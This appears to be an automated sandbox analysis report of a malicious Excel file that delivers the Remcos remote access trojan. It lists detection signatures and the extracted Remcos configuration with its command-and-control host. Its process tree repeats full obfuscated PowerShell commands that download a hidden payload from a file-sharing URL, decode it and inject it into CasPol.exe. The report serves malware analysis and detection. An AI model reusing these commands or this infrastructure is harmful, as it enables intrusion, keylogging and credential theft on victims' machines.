Windows Analysis Report
pi-77159.xls

Overview

General Information

Sample name:pi-77159.xls
Analysis ID:1559540
MD5:65fbcc8da027e55f200e662f94037339
SHA1:a45ff70dd8f364f4d3f0d4be15430fd288bdbbf7
SHA256:cc01815d54a289d110af781b87dea4c4625d068f6a4f13aaa39d25fd723c136d
Tags:xlsuser-abuse_ch

Detection

Remcos, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch or control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locale information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3552 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3844 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3976 cmdline: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3320 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3308 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB76D.tmp" "c:\Users\user\AppData\Local\Temp\qvgum1lr\CSC3E3F8E93A6CD4B728B9027B482B0AFC2.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 892 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 1368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 1712 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • CasPol.exe (PID: 800 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
    • AcroRd32.exe (PID: 808 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
    • mshta.exe (PID: 3652 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3784 cmdline: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3952 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3192 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3128 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1F34.tmp" "c:\Users\user\AppData\Local\Temp\xijxxvat\CSCB7FD98358CD1456E9F7F690FA2FF526.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 1080 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 1940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 2144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • CasPol.exe (PID: 1260 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["banaya.duckdns.org:6946:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VCYBO3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: C:\ProgramData\remcos\logs.dat | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswhichgivingbestopportunities[1].hta | Rule: JoeSecurity_HtmlPhish_44 | Description: Yara detected HtmlPhish_44 | Author: Joe Security
Source: 00000022.00000002.587134111.0000000000575000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
Source: 34.2.CasPol.exe.400000.0.unpack | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 34.2.CasPol.exe.400000.0.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 34.2.CasPol.exe.400000.0.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 34.2.CasPol.exe.400000.0.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x6aaf8:$a1: Remcos restarted by watchdog!
  • 0x6b070:$a3: %02i:%02i:%02i:%03i
Source: 34.2.CasPol.exe.400000.0.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64e04:$str_b2: Executing file:
  • 0x65c3c:$str_b3: GetDirectListeningPort
  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65780:$str_b7: \update.vbs
  • 0x64e2c:$str_b9: Downloaded file:
  • 0x64e18:$str_b10: Downloading file:
  • 0x64ebc:$str_b12: Failed to upload file:
  • 0x65c04:$str_b13: StartForward
  • 0x65c24:$str_b14: StopForward
  • 0x656d8:$str_b15: fso.DeleteFile "
  • 0x6566c:$str_b16: On Error Resume Next
  • 0x65708:$str_b17: fso.DeleteFolder "
  • 0x64eac:$str_b18: Uploaded file:
  • 0x64e6c:$str_b19: Unable to delete:
  • 0x656a0:$str_b20: while fso.FileExists("
  • 0x65349:$str_c0: [Firefox StoredLogins not found]

                    System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: File created | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3552, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswhichgivingbestopportunities[1].hta
Source: Process started | Author: Thomas Patzke | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3976, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , ProcessId: 892, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3552, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3844, ProcessName: mshta.exe
